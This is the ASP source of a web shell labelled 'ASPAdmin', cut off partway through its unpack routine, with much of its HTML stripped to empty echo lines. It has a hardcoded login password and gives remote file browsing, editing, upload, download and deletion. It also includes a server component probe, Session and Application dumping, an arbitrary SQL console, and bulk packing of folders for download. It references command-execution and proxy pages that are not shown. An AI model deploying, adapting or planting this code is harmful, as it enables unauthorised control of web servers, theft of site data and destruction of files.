<% Option Explicit Response.Buffer = True Dim url, conn, sUrlB, theAct, thePath, rootPath, PageSize Dim accessStr, pageName, sysFileList, isSqlServer, sPacketName theAct = GetPost("theAct") PageSize = 20 ''默认每页记录数 isSqlServer = False rootPath = Server.MapPath("/") pageName = GetPost("PageName") url = Request.ServerVariables("URL") ''当前页的相对路径 sPacketName = "Packet.mdb" ''文件包默认文件名 thePath = Replace(getPost("thePath"), "\\", "\") sysFileList = "$" & sPacketName & "$" & Left(sPacketName, InStrRev(sPacketName, ".") - 1) & ".ldb$" accessStr = "Provider=Microsoft.Jet.OLEDB.4.0; Data Source={$dbSource};User Id={$userId};Jet OLEDB:Database Password=""{$passWord}"";" Const m = "ASPAdmin_A" ''Session标志 Const isDebugMode = False 'False,True''是否调试模式 Const maxPageCount = 600 ''查询时最多只列出N页的链接 Const userPassword = "cr271828" ''登录密码 Const imageFileExt = "$gif$jpg$bmp$" ''图像后缀列表 Const editableFileExt = "$vbs$log$asp$txt$php$ini$inc$htm$html$xml$conf$config$jsp$java$htt$lst$aspx$php3$php4$js$css$bat$asa$" Sub echo(str) Response.Write(str) End Sub Sub IsIn() If Session(m & "userPassword") <> userPassword Then echo "" End If End Sub Function IIf(var, val1, val2) If var = True Then IIf = val1 Else IIf = val2 End If End Function Sub RedirectTo(url) Response.Redirect(url) End Sub Function GetPost(var) Dim val If Request.QueryString("PageName") = "PageUpload" Then pageName = "PageUpload" Exit Function End If val = RTrim(Request.Form(var)) If val = "" Then val = RTrim(Request.QueryString(var)) End If GetPost = val End Function Function HtmlEncode(str) If IsNull(str) Then Exit Function HtmlEncode = Server.HTMLEncode(str) End Function Function UrlEncode(str) If IsNull(str) Then Exit Function UrlEncode = Server.UrlEncode(str) End Function Sub ShowTitle(str) Response.Write "" & str & " " Response.Write "" End Sub Function GetTheSize(num) Dim i, arySize(4) arySize(0) = "B" arySize(1) = "KB" arySize(2) = "MB" arySize(3) = "GB" arySize(4) = "TB" While(num / 1024 >= 1) num = Fix(num / 1024 * 100) / 100 i = i + 1 WEnd GetTheSize = num & " " & arySize(i) End Function Sub ShowErr(str) Dim i, arrayStr str = Server.HtmlEncode(str) arrayStr = Split(str, "$$") echo "" echo "出错信息:

" For i = 0 To UBound(arrayStr) echo "  " & (i + 1) & ". " & arrayStr(i) & "
" Next echo "
" Response.End() End Sub Sub CreateFolder(thePath) Dim i i = InStr(Mid(thePath, 4), "\") + 3 Do While i > 0 If fso.FolderExists(Left(thePath, i)) = False Then fso.CreateFolder(Left(thePath, i - 1)) End If If InStr(Mid(thePath, i + 1), "\") Then i = i + Instr(Mid(thePath, i + 1), "\") Else i = 0 End If Loop End Sub Sub AlertThenClose(str) If str = "" Then Response.Write "" Else Response.Write "" End If End Sub Sub ChkErr(Err) If Err Then echo "
  • 错误: " & Err.Description & "
  • 错误源: " & Err.Source & "

  • " echo "
     By Marcos 2005.06
    " Err.Clear Response.End End If End Sub Sub TopMenu() echo "
    " echo "" echo "
    " echo "" End Sub Rem ++++++++++++++++++++++++++++++++++++ Rem 以下是页面选择部分 Rem ++++++++++++++++++++++++++++++++++++ PageOther() If pageName <> "" Then IsIn() TopMenu() End If Select Case pageName Case "PageSearch" PageSearch() Case "PageCheck" PageCheck() Case "PageFso" PageFso() Case "PageDBTool" PageDBTool() Case "PageUpload" PageUpload() Case "PagePack" PagePack() Case "PageExecute" PageExecute() Case "PageWebProxy" PageWebProxy() Case "", "PageOut" PageLogin() End Select Rem +++++++++++++++++++++++++++++++++++++ Rem 以下是各功能模块部分 Rem +++++++++++++++++++++++++++++++++++++ Sub PageSearch() Dim strKey, strPath strKey = GetPost("Key") Server.ScriptTimeout = 5000 If thePath = "" Then thePath = rootPath ShowTitle("文本文件搜索器") SearchTable(strKey) If theAct <> "" And strKey <> "" Then SearchIt(strKey) End If End Sub Sub SearchTable(strKey) echo "" echo "" echo "" echo "" echo "" echo "" echo "" echo "" echo "" echo "" echo "" echo "" echo "" echo "" echo "" echo "" echo "" echo "" echo "" echo "" echo "" echo "" echo "" echo "" echo "
    8 文本文件搜索器(需FSO支持)
     
     路径 " echo "
     关键字  " echo "" echo "
     
    By Marcos 2005.06 
    " End Sub Sub SearchIt(key) Dim strPath, theFolder Response.Buffer = True strPath = thePath If fso.FolderExists(strPath) = False Then ShowErr(thePath & " 目录不存在或者不允许访问!") End If Set theFolder = fso.GetFolder(strPath) echo "
    " Select Case theAct Case "Both" Call SearchFolder(theFolder, key, 1) Case "FileName" Call SearchFolder(theFolder, key, 2) Case "FileContent" Call SearchFolder(theFolder, key, 3) End Select echo "
    " Set theFolder = Nothing End Sub Sub SearchFolder(folder, key, flag) Dim ext, title, theFile, theFolder For Each theFile In folder.Files ext = LCase(fso.GetExtensionName(theFile.Path)) If flag = 1 Or flag = 2 Then If InStr(LCase(theFile.Name), LCase(key)) > 0 Then echo FileLink(theFile, "") End If If flag = 1 Or flag = 3 Then If Instr(EditableFileExt, "$" & ext & "$") > 0 Then If SearchFile(theFile, key, title) Then echo FileLink(theFile, title) End If End If Next Response.Flush() For Each theFolder In folder.SubFolders Call SearchFolder(theFolder, key, flag) Next end sub Function SearchFile(f, s, title) Dim theFile, content, pos1, pos2 If isDebugMode = False Then On Error Resume Next Set theFile = fso.OpenTextFile(f.Path) content = theFile.ReadAll() theFile.Close Set theFile = Nothing If Err Then Err.Clear End If SearchFile = InStr(1, content, s, 1) If SearchFile > 0 Then pos1 = InStr(1, content, "", 1) pos2 = InStr(1, content, "", 1) title = "" If pos1 > 0 And pos2 > 0 Then title = Mid(content, pos1 + 7, pos2 - pos1 - 7) End If End If End Function Function FileLink(file, title) fileLink = file.Path If title = "" Then title = file.Name End If fileLink = " " & title & " " & fileLink & "
    " End Function Sub PageCheck() ShowTitle("服务器信息探针") InfoCheck() If theAct <> "" Then GetAppOrSession(theAct) End If ObjCheck() End Sub Sub InfoCheck() Dim aryCheck(6) If isDebugMode = False Then On Error Resume Next aryCheck(0) = Server.ScriptTimeOut() & "(秒)" aryCheck(1) = FormatDateTime(Now(), 0) aryCheck(2) = Request.ServerVariables("SERVER_NAME") aryCheck(2) = aryCheck(2) & ", " & Request.ServerVariables("LOCAL_ADDR") aryCheck(2) = aryCheck(2) & ":" & Request.ServerVariables("SERVER_PORT") aryCheck(3) = Request.ServerVariables("OS") aryCheck(3) = IIf(aryCheck(3) = "", "Windows2003", aryCheck(3)) & ", " & Request.ServerVariables("SERVER_SOFTWARE") aryCheck(3) = aryCheck(3) & ", " & ScriptEngine & "/" & ScriptEngineMajorVersion & "." & ScriptEngineMinorVersion & "." & ScriptEngineBuildVersion aryCheck(4) = rootPath & ", " & GetTheSize(fso.GetFolder(rootPath).Size) aryCheck(5) = "Path: " & Request.ServerVariables("PATH_TRANSLATED") & "
    " aryCheck(5) = aryCheck(5) & " Url : http://" & Request.ServerVariables("SERVER_NAME") & Request.ServerVariables("Url") aryCheck(6) = "变量数: " & Application.Contents.Count() & "(Application)," aryCheck(6) = aryCheck(6) & " 会话数: " & Session.Contents.Count & "(Session)," aryCheck(6) = aryCheck(6) & " 当前会话ID: " & Session.SessionId() echo "" echo "" echo "" echo "" echo "" echo "" echo "" echo "" echo "" echo "" echo "" echo "" echo "" echo "" echo "" echo "" echo "" echo "" echo "" echo "" echo "" echo "" echo "" echo "" echo "" echo "" echo "" echo "" echo "" echo "" echo "" echo "" echo "" echo "" echo "" echo "" echo "" echo "" echo "" echo "" echo "" echo "" echo "" echo "" echo "" echo "
    8 服务器基本信息" echo "
     
     项目 值
     默认超时 "&aryCheck(0)&"
     当前时间 "&aryCheck(1)&"
     服务器名 "&aryCheck(2)&"
     软件环境 "&aryCheck(3)&"
     站点目录 "&aryCheck(4)&"
     当前路径 "&aryCheck(5)&"
     其它 "&aryCheck(6)&"
     
    By Marcos 2005.06 
    " End Sub Sub ObjCheck() Dim aryObj(19) Dim x, objTmp, theObj, strObj If isDebugMode = False Then On Error Resume Next strObj = Trim(getPost("TheObj")) aryObj(0) = "MSWC.AdRotator|广告轮换组件" aryObj(1) = "MSWC.BrowserType|浏览器信息组件" aryObj(2) = "MSWC.NextLink|内容链接库组件" aryObj(3) = "MSWC.Tools|" aryObj(4) = "MSWC.Status|" aryObj(5) = "MSWC.Counters|计数器组件" aryObj(6) = "MSWC.PermissionChecker|权限检测组件" aryObj(7) = "Adodb.Connection|ADO 数据对象组件" aryObj(8) = "CDONTS.NewMail|虚拟 SMTP 发信组件" aryObj(9) = "Scripting.FileSystemObject|FSO组件" aryObj(10) = "Adodb.Stream|Stream 流组件" aryObj(11) = "Shell.Application|" aryObj(12) = "WScript.Shell|" aryObj(13) = "Wscript.Network|" aryObj(14) = "ADOX.Catalog|" aryObj(15) = "JMail.SmtpMail|JMail 邮件收发组件" aryObj(16) = "Persits.Upload.1|ASPUpload 文件上传组件" aryObj(17) = "LyfUpload.UploadFile|刘云峰的文件上传组件组件" aryObj(18) = "SoftArtisans.FileUp|SA-FileUp 文件上传组件" aryObj(19) = strObj & "|您所要检测的组件" echo "
    " echo "" echo "" echo "" echo "" echo "" echo "" echo "" echo "" echo "" echo "" echo "" echo "" For Each x In aryObj theObj = Split(x, "|") If theObj(0) = "" Then Exit For Set objTmp = Server.CreateObject(theObj(0)) If Err <> -2147221005 Then x = x & "|√|" x = x & objTmp.Version Else x = x & "|×|" End If If Err Then Err.Clear Set objTmp = Nothing theObj = Split(x, "|") theObj(1) = theObj(0) & IIf(theObj(1) <> "", " (" & theObj(1) & ")", "") echo "" echo "" echo "" echo "" echo "" Next echo "" echo "" echo "" echo "" echo "" echo "" echo "" echo "" echo "" echo "" echo "" echo "" echo "
    8 服务器组件信息" echo "
     
     组件(描述)支持版本
     " & theObj(1) & "" & theObj(2) & "" & theObj(3) & "
     其它组件检测:" echo "" echo "
     
    By Marcos 2005.06 
    " End Sub Sub GetAppOrSession(theAct) Dim x, y If isDebugMode = False Then On Error Resume Next echo "
    " echo "" echo "" echo "" echo "" echo "" echo "" echo "" echo "" echo "" echo "" echo "" If theAct = "app" Then For Each x In Application.Contents echo "" Next End If If theAct = "session" Then For Each x In Session.Contents echo "" Next End If echo "" echo "" echo "" echo "" echo "" echo "" echo "
    8 Application/Session 查看" echo "
     
     变量 值
    " echo " " & x & "" echo "" If IsArray(Application(x)) = True Then For Each y In Application(x) echo "
    " & Replace(HtmlEncode(y), vbNewLine, "
    ") & "
    " Next Else echo Replace(HtmlEncode(Application(x)), vbNewLine, "
    ") End If echo "
    " echo " " & x & "" echo "" echo Replace(HtmlEncode(Session(x)), vbNewLine, "
    ") echo "
     
    By Marcos 2005.06 
    " End Sub Sub PageFso() ShowTitle("FSO文件浏览操作器") Select Case theAct Case "rename" RenOne() Case "download" DownTheFile() Response.End() Case "del" DelOne() Case "newone" NewOne() Case "saveas" SaveAs() Case "save" SaveToFile() ' AlertThenClose("文件修改成功!") ShowEdit() Response.End() Case "showedit" ShowEdit() Response.End() Case "showimage" ShowImage() Response.End() Case "copy", "move" MoveCopyOne() End Select If theAct <> "" Then thePath = GetPost("truePath") FsoFileExplorer() End Sub Sub FsoFileExplorer() Dim objX, theFolder, folderId, extName, parentFolderName Dim strPath If isDebugMode = False Then On Error Resume Next If thePath = "" Then thePath = rootPath strPath = thePath If fso.FolderExists(strPath) = False Then ShowErr(thePath & " 目录不存在或者不允许访问!") End If Set theFolder = fso.GetFolder(strPath) parentFolderName = fso.GetParentFolderName(strPath) & "\" echo "" echo "" echo "" echo "" echo "" echo "" echo "" echo "" echo "" echo "" echo "" echo "" echo "" echo "" echo "" echo "" echo "
    8 FSO文件浏览操作器" echo "
     
     " echo "路径: " echo "" echo " " echo " " echo "
     
    " echo "" echo "" echo "" echo "" echo "" echo "" For Each objX In theFolder.SubFolders folderId = Replace(objX.Path, "\", "\\") echo "" echo "" echo "" Next For Each objX In theFolder.Files If Left(objX.Path, Len(rootPath)) <> rootPath Then folderId = "" Else folderId = Replace(Replace(UrlEncode(Mid(objX.Path, Len(rootPath) + 1)), "%2E", "."), "+", "%20") End If echo "" echo "" Next echo "" echo "
     
    " If parentFolderName <> "\" Then folderId = Replace(parentFolderName, "\", "\\") echo " ↑回上级目录" End If echo "大小最后修改操作
     " echo "" echo ""& objX.Name & "" echo "-" & objX.DateLastModified & "" echo "" echo "" echo "" echo "
     " echo "" If folderId = "" Then echo objX.Name Else echo "" & objX.Name & "" End If echo "" & GetTheSize(objX.Size) & "" & objX.DateLastModified & "" echo "" extName = LCase(fso.GetExtensionName(objX.Path)) If InStr(editableFileExt, "$" & extName & "$") > 0 Then echo "" End If If InStr(imageFileExt, "$" & extName & "$") > 0 Then echo "" End If If extName = "mdb" Then echo "" End If echo "" echo "" echo "" echo "
    " echo "" echo "" echo "
    " echo "
    " echo "
    " echo "
    " echo "
    " echo "移动选中文件(夹)到


    " echo "复制选中文件(夹)到


    " echo "
     
    By Marcos 2005.06 
    " Set theFolder = Nothing End Sub Sub RenOne() Dim objX, strPath, aryParam, isFile, isFolder If isDebugMode = False Then On Error Resume Next aryParam = Split(GetPost("param"), ",") strPath = GetPost("truePath") & "\" aryParam(0) = strPath & aryParam(0) isFile = fso.FileExists(aryParam(0)) isFolder = fso.FolderExists(aryParam(0)) If isFile = False And isFolder = False Then ShowErr("文件(夹)不存在或者不允许访问!") End If If isFile = False Then Set objX = fso.GetFolder(aryParam(0)) objX.Name = aryParam(1) Else Set objX = fso.GetFile(aryParam(0)) objX.Name = aryParam(1) End If Set objX = Nothing ChkErr(Err) End Sub Sub DownTheFile() Response.Clear Dim stream, strPath, fileContentType If isDebugMode = False Then On Error Resume Next strPath = GetPost("truePath") & "\" & GetPost("param") Set stream = Server.CreateObject("adodb.stream") stream.Open stream.Type = 1 stream.LoadFromFile(strPath) ChkErr(Err) Response.AddHeader "Content-Disposition", "Attachment; Filename=" & GetPost("param") Response.AddHeader "Content-Length", stream.Size Response.Charset = "UTF-8" Response.ContentType = "Application/Octet-Stream" Response.BinaryWrite stream.Read Response.Flush stream.Close Set stream = Nothing End Sub Sub DelOne() Dim objX, strPath If isDebugMode = False Then On Error Resume Next strPath = GetPost("truePath") & "\" For Each objX In Request.Form("checkBox") If fso.FolderExists(strPath & objX) = True Then Call fso.DeleteFolder(strPath & objX, True) ChkErr(Err) Else If fso.FileExists(strPath & objX) = True Then Call fso.DeleteFile(strPath & objX, True) ChkErr(Err) End If End If Next End Sub Sub MoveCopyOne() Dim objX, strPath, strMoveTo, strCopyTo If isDebugMode = False Then On Error Resume Next strMoveTo = GetPost("MoveTo") strCopyTo = GetPost("CopyTo") strPath = GetPost("truePath") & "\" If theAct = "move" Then strMoveTo = strMoveTo & "\" Else strCopyTo = strCopyTo & "\" End If For Each objX In Request.Form("checkBox") If theAct = "move" Then If InStr(strMoveTo, strPath & objX) > 0 Then ShowErr("目标文件夹不能在源文件夹内") End If If fso.FileExists(strPath & objX) = True Then Call fso.MoveFile(strPath & objX, strMoveTo & objX) Else Call fso.MoveFolder(strPath & objX, strMoveTo & objX) End If Else If InStr(strCopyTo, strPath & objX) > 0 Then ShowErr("目标文件夹不能在源文件夹内") End If If fso.FileExists(strPath & objX) = True Then Call fso.CopyFile(strPath & objX, strCopyTo & objX) Else Call fso.CopyFolder(strPath & objX, strCopyTo & objX) End If End If ChkErr(Err) Next End Sub Sub NewOne() Dim objX, strPath, aryParam If isDebugMode = False Then On Error Resume Next aryParam = Split(GetPost("param"), ",") strPath = GetPost("truePath") & "\" & aryParam(0) If aryParam(1) = "file" Then Call fso.CreateTextFile(strPath, False) Else fso.CreateFolder(strPath) End If End Sub Sub ShowEdit() Dim theFile, strPath If isDebugMode = False Then On Error Resume Next strPath = GetPost("truePath") & "\" & GetPost("param") If Right(strPath, 1) = "\" Then strPath = Left(strPath, Len(strPath) - 1) Set theFile = fso.OpenTextFile(strPath, 1, False) ChkErr(Err) echo "" echo "" echo "" echo "" echo "" echo "" echo "" echo "" echo "" echo "" echo "" echo "" echo "" echo "" echo "" echo "" echo "" echo "" echo "" echo "" echo "" echo "" echo "" echo "
    8 FSO文本编辑器
     
     " echo "
     
     
    " echo "" ' echo "" echo "
    " Set theFile = Nothing End Sub Sub SaveToFile() Dim theFile, strPath, fileContent If isDebugMode = False Then On Error Resume Next fileContent = GetPost("fileContent") strPath = GetPost("truePath") Set theFile = fso.OpenTextFile(strPath, 2, True) theFile.Write fileContent theFile.Close ChkErr(Err) Set theFile = Nothing End Sub Sub SaveAs() Dim strPath, aryParam, isFile If isDebugMode = False Then On Error Resume Next aryParam = Split(GetPost("param"), ",") aryParam(0) = aryParam(0) aryParam(1) = aryParam(1) isFile = fso.FileExists(aryParam(0)) If isFile = True Then fso.CopyFile aryParam(0), aryParam(1), False Else fso.CopyFolder aryParam(0), aryParam(1), False End If ChkErr(Err) End Sub Sub ShowImage() Dim stream, strPath, fileContentType If isDebugMode = False Then On Error Resume Next strPath = GetPost("truePath") & "\" & GetPost("param") Set stream = Server.CreateObject("adodb.stream") stream.Open stream.Type = 1 stream.LoadFromFile(strPath) ChkErr(Err) Response.Clear Response.BinaryWrite stream.Read stream.Close Set stream = Nothing End Sub Sub PageDBTool() ShowTitle("Access + SQL Server 数据库操作") echo "
    " If theAct <> "" And theAct <> "Query" And theAct <> "ShowTables" Then SqlShowEdit() echo "
    " Response.End() End If ShowDBTool() Select Case theAct Case "Query" ShowQuery() Case "ShowTables" ShowTables() End Select echo "" End Sub Sub ShowDBTool() echo "" echo "" echo "" echo "" echo "" echo "" echo "" echo "" echo "" echo "" echo "" echo "" echo "" echo "" echo "" echo "" echo "" echo "" echo "" echo "
    8 Access + SQL Server 数据库操作
     
    " echo "" echo "
     
    " echo "" echo "" echo "" echo "" echo "
    " End Sub Sub ShowTables() Dim Cat, objTable, objColumn, intColSpan, objSchema If isDebugMode = False Then On Error Resume Next echo "
    " echo "" echo "" echo "" echo "" echo "" echo "" CreateConn() Set Cat = Server.CreateObject("ADOX.Catalog") Cat.ActiveConnection = conn.ConnectionString echo "" echo "" echo "" echo "" echo "" echo "" echo "" echo "" echo "
    8 数据表及结构查看
     
    " For Each objTable In Cat.Tables echo "" & objTable.Name & "" Next echo "" intColSpan = IIf(isSqlServer = True, "4", "6") For Each objTable In Cat.Tables echo "" echo "" echo "" echo "" echo "" echo "" echo "" echo "" echo "" echo "" echo "" echo "" If isSqlServer = False Then echo "" echo "" End If echo "" For Each objColumn In Cat.Tables(objTable.Name).Columns echo "" echo "" echo "" If objColumn.DefinedSize <> 0 Then echo "" Else echo "" End If echo "" If isSqlServer = False Then echo "" echo "" End If echo "" Next echo "" echo "" echo "" echo "
     
     " echo objTable.Name & "
     列名类型大小可否为空默认值描述
    " & objColumn.Name & "" & GetDataType(objColumn.Type) & "" & objColumn.DefinedSize & "" & IIf(objColumn.Precision <> 0, objColumn.Precision, " ") & "" & IIf(objColumn.Attributes = 1, "False", "True") & "" echo HtmlEncode(objColumn.Properties("Default").value) & "" echo objColumn.Properties("Description") & "
     

    " Next echo "
     
    By Marcos 2005.06 
    " Set Cat = Nothing DestoryConn() End Sub Sub ShowQuery() Dim i, j, x, rs, sql, sqlB, sqlC, Cat, intPage, objTable, strParam, strTable, strPrimaryKey If isDebugMode = False Then On Error Resume Next sql = GetPost("sql") strParam = GetPost("param") strTable = GetPost("theTable") Set rs = Server.CreateObject("Adodb.RecordSet") If IsNumeric(strParam) = True Then intPage = strParam Else intPage = 1 strTable = strParam sql = "" End If If sql = "" Then sql = "Select * From [" & strTable & "]" End If For i = 1 To Request.Form("KeyWord").Count If Request.Form("KeyWord")(i) <> "" Then sqlC = Replace(Request.Form("KeyWord")(i), "'", "''") sqlC = IIf(Request.Form("JoinTag")(i) = " like ", "'" & sqlC & "'", sqlC) sqlB = sqlB & "[" & Request.Form("Fields")(i) & "]" & Request.Form("JoinTag")(i) & sqlC & Request.Form("JoinTag2")(i) End If Next If sqlB <> "" Then sql = "Select * From [" & strTable & "] Where " & sqlB If Right(sql, 4) = " Or " Then sql = Left(sql, Len(sql) - 4) If Right(sql, 5) = " And " Then sql = Left(sql, Len(sql) - 5) End If echo "" echo "" echo " " echo "" echo "" echo "" echo "
    " echo "" echo "" echo "" echo "" echo "" echo "" CreateConn() Set Cat = Server.CreateObject("ADOX.Catalog") Cat.ActiveConnection = conn.ConnectionString echo "" echo "" echo "" echo "" echo "" echo "" echo "" echo "" echo "
    8 SQL查询器
     
    " For Each objTable In Cat.Tables echo "" If strTable = objTable.Name Then echo "" & objTable.Name & "" Else echo objTable.Name End If echo "" Next echo "" If LCase(Left(sql, 7)) = "select " Then rs.Open sql, conn, 1, 1 ChkErr(Err) rs.PageSize = PageSize If Not rs.Eof Then rs.AbsolutePage = intPage End If echo "
    " echo "" echo "" echo "" echo "" echo "" echo "" echo "" echo "
     
     查询
    " echo "
    " echo "" echo "" echo " " echo "';"">" echo "
    " echo "" echo "
     

    " If rs.Fields.Count > 0 Then strPrimaryKey = GetPrimaryKey(strTable) echo "" echo "" echo "" echo "" echo "" echo "" For j = 0 To rs.Fields.Count - 1 echo "" Next For i = 1 To rs.PageSize If rs.Eof Then Exit For echo "" echo "" echo "" Else echo "" echo "" End If For j = 0 To rs.Fields.Count - 1 echo "" Next echo "" rs.MoveNext Next End If echo "" echo "
     
    操作" & rs.Fields(j).Name & "
    " If strPrimaryKey <> "" Then echo "" echo "" & HtmlEncode(IIf(Len(rs(j)) > 50, Left(rs(j), 50), rs(j))) & "
     Page: " For i = 1 To rs.PageCount If i > maxPageCount Then echo "..." Exit For End If echo Replace("" & i & " ", "{$font" & intPage & "}", " color=red") Next echo "
    " rs.Close Else conn.Execute(sql) ChkErr(Err) echo "" Set rs = Nothing Set Cat = Nothing DestoryConn() Exit Sub End If echo "
     
    By Marcos 2005.06 
    " Set rs = Nothing Set Cat = Nothing DestoryConn() End Sub Sub SqlShowEdit() Dim intFindI, intFindJ, intFindK, intFindL, intFindM, strJoinTag, multiTables Dim i, x, rs, sql, strTable, strExtra, strParam, intI, strColumn, strValue, strPrimaryKey If isDebugMode = False Then On Error Resume Next sql = GetPost("sql") strParam = GetPost("param") strTable = GetPost("theTable") intI = InStr(strParam, "!") intFindI = InStr(LCase(sql), " where") intFindJ = InStrRev(LCase(sql), "order ") intFindK = IIf(LCase(Right(sql, 4)) = "desc", "1", "0") strValue = Mid(strParam, intI + 1) strColumn = Left(strParam, intI - 1) strExtra = IIf(theAct = "next", ">", IIf(theAct = "pre", "<", "")) If intFindJ > 0 Then sql = Left(sql, intFindJ - 1) If intFindI > 0 Then strJoinTag = ") And " sql = Left(sql, intFindI + 5) & "(" & Mid(sql, intFindI + 6) Else strJoinTag = " Where " End If If intFindK > 0 Then strExtra = IIf(strExtra = ">", "<", IIf(strExtra = "<", ">", "")) CreateConn() strPrimaryKey = GetPrimaryKey(strTable) Set rs = Server.CreateObject("Adodb.RecordSet") If strExtra <> "" And IsNumeric(strValue) = True Then sql = "Select Top 1" & Mid(sql, 7) & strJoinTag sql = sql & strColumn & " " & strExtra & " " & strValue & " Order By " & strColumn & IIf(strExtra = "<", " Desc", " Asc") Else sql = sql & strJoinTag & strColumn & " like '" & Replace(strValue, "'", "''") & "'" End If intFindM = InStr(LCase(sql), "from") intFindI = InStr(LCase(sql), " where") intFindL = InStr(intFindM, LCase(sql), ",", 1) If intFindL > 0 Then If (intFindL > intFindM) And (intFindL < intFindI) Then multiTables = True End If End If If theAct <> "edit" Then rs.Open sql, conn, 1, 3 ChkErr(Err) If rs.Eof Then echo "" Response.End() End If If theAct = "new" Then rs.AddNew If theAct = "del" Then rs.Delete rs.Update AlertThenClose("删除成功!") Response.End Else If theAct <> "pre" And theAct <> "next" Then For Each x In rs.Fields If strPrimaryKey <> x.Name Then rs(x.Name) = Request.Form(x.Name & "_Column") End If Next rs.Update End If strValue = rs(strColumn) End If If theAct = "new" Then sql = "Select * From [" & strTable & "] Where " & strColumn & " like '" & Replace(strValue, "'", "''") & "'" End If rs.Close End If rs.Open sql, conn, 1, 1 echo "" echo "" echo "" echo "" echo "" echo "" echo "" echo "" echo "" echo "" echo "" echo "" echo "" For Each x In rs.Fields echo "" echo "" echo "" Next echo "" echo "" echo "" echo "
     
    8 SQL数据修改
     " & HtmlEncode(x.Name) & "
     (" & GetDataType(x.Type) & ")
     " echo "" echo "
    " If multiTables = False Then If strPrimaryKey = "" Then echo "" Else echo "" echo "" echo "" End If Else echo "" End If echo "" If IsNumeric(strValue) = True Then echo "" echo "" End If echo "
    " rs.Close Set rs = Nothing DestoryConn() End Sub Sub CreateConn() Dim connStr, mdbInfo, userName, passWord, strPath If isDebugMode = False Then On Error Resume Next Set conn = Server.CreateObject("Adodb.Connection") If LCase(Left(thePath, 4)) = "sql:" Then connStr = Mid(thePath, 5) isSqlServer = True Else mdbInfo = Split(thePath, ";") strPath = mdbInfo(0) strPath = strPath ChkErr(Err) If UBound(mdbInfo) >= 2 Then userName = mdbInfo(1) passWord = mdbInfo(2) End If connStr = Replace(accessStr, "{$dbSource}", strPath) connStr = Replace(connStr, "{$userId}", userName) connStr = Replace(connStr, "{$passWord}", passWord) end if conn.Open connStr ChkErr(Err) End Sub Sub DestoryConn() conn.Close Set conn = Nothing End Sub Function GetDataType(flag) Dim str Select Case flag Case 0 : str = "EMPTY" Case 2 : str = "SMALLINT" Case 3 : str = "INTEGER" Case 4 : str = "SINGLE" Case 5 : str = "DOUBLE" Case 6 : str = "CURRENCY" Case 7 : str = "DATE" Case 8 : str = "BSTR" Case 9 : str = "IDISPATCH" Case 10 : str = "ERROR" Case 11 : str = "BIT" Case 12 : str = "VARIANT" Case 13 : str = "IUNKNOWN" Case 14 : str = "DECIMAL" Case 16 : str = "TINYINT" Case 17 : str = "UNSIGNEDTINYINT" Case 18 : str = "UNSIGNEDSMALLINT" Case 19 : str = "UNSIGNEDINT" Case 20 : str = "BIGINT" Case 21 : str = "UNSIGNEDBIGINT" Case 72 : str = "GUID" Case 128 : str = "BINARY" Case 129 : str = "CHAR" Case 130 : str = "WCHAR" Case 131 : str = "NUMERIC" Case 132 : str = "USERDEFINED" Case 133 : str = "DBDATE" Case 134 : str = "DBTIME" Case 135 : str = "DBTIMESTAMP" Case 136 : str = "CHAPTER" Case 200 : str = "VARCHAR" Case 201 : str = "LONGVARCHAR" Case 202 : str = "VARWCHAR" Case 203 : str = "LONGVARWCHAR" Case 204 : str = "VARBINARY" Case 205 : str = "LONGVARBINARY" Case Else : str = flag End Select GetDataType = str End Function Function GetPrimaryKey(strTable) Dim rsPrimary If isDebugMode = False Then On Error Resume Next Set rsPrimary = conn.OpenSchema(28, Array(Empty, Empty, strTable)) If Not rsPrimary.Eof Then GetPrimaryKey = rsPrimary("COLUMN_NAME") Set rsPrimary = Nothing End Function Sub PagePack() ShowTitle("文件夹打包/解开器") Server.ScriptTimeOut = 5000 If theAct = "PackIt" Or theAct = "PackOne" Then PackIt() AlertThenClose("打包成功!生成为该文件夹目录下的" & sPacketName & "文件.\n下载下来后可以使用unpack.vbs进行解开.") Response.End() End If If theAct = "UnPack" Then UnPack() AlertThenClose("解开成功!解开目录为" & sPacketName & "所在目录.") Response.End() End If PackTable() End Sub Sub PackTable() echo "" echo "" echo "" echo "" echo "" echo "" echo "" echo "" echo "" echo "" echo "" echo "" echo "" echo "" echo "" echo "" echo "" echo "" echo "" echo "" echo "" echo "" echo "" echo "" echo "
    8 文件夹打包/解开器(需FSO支持)" echo "
     
     打包  " echo "" echo "" echo "" echo "
     解包  " echo "" echo "" echo "" echo "
     
    By Marcos 2005.06 
    " End Sub Sub PackIt() Dim rs, db, conn, stream, connStr, objX, strPath, strPathB, isFolder, adoCatalog If isDebugMode = False Then On Error Resume Next strPath = thePath db = strPath & "\" & sPacketName Set rs = Server.CreateObject("ADODB.RecordSet") Set stream = Server.CreateObject("ADODB.Stream") Set conn = Server.CreateObject("ADODB.Connection") Set adoCatalog = Server.CreateObject("ADOX.Catalog") connStr = "Provider=Microsoft.Jet.OLEDB.4.0; Data Source=" & db If fso.FolderExists(strPath) = False Then ShowErr(thePath & " 目录不存在或者不允许访问!") End If If theAct = "PackIt" Then If fso.GetFolder(strPath).Size > 300 * 1024 * 1024 Then ShowErr("该目录超过300M, 可能造成服务器当机, 操作停止.") End If End If If fso.FileExists(db) = False Then adoCatalog.Create connStr conn.Open connStr conn.Execute("Create Table FileData(Id int IDENTITY(0,1) PRIMARY KEY CLUSTERED, thePath VarChar, fileContent Image)") Else conn.Open connStr End If stream.Open stream.Type = 1 rs.Open "FileData", conn, 3, 3 If theAct = "PackIt" Then Call FsoTreeForMdb(strPath, rs, stream) Else strPath = GetPost("truePath") & "\" For Each objX In Request.Form("checkBox") strPathB = strPath & objX isFolder = fso.FolderExists(strPathB) If isFolder = True Then Call FsoTreeForMdb(strPathB, rs, stream) Else If InStr(sysFileList, "$" & objX & "$") <= 0 Then rs.AddNew rs("thePath") = Mid(strPathB, 4) stream.LoadFromFile(strPathB) rs("fileContent") = stream.Read() rs.Update End If End If Next End If rs.Close Conn.Close stream.Close Set rs = Nothing Set conn = Nothing Set stream = Nothing Set adoCatalog = Nothing End Sub Sub UnPack() Dim rs, ws, str, conn, stream, connStr, strPath, theFolder If isDebugMode = False Then On Error Resume Next strPath = thePath str = fso.GetParentFolderName(strPath) & "\" Set rs = CreateObject("ADODB.RecordSet") Set stream = CreateObject("ADODB.Stream") Set conn = CreateObject("ADODB.Connection") connStr = "Provider=Microsoft.Jet.OLEDB.4.0;Data Source=" & strPath conn.Open connStr ChkErr(Err) rs.Open "FileData", conn, 1, 1 stream.Open stream.Type = 1 Do Until rs.Eof theFolder = Left(rs("thePath"), InStrRev(rs("thePath"), "\")) If fso.FolderExists(str & theFolder) = False Then CreateFolder(str & theFolder) End If 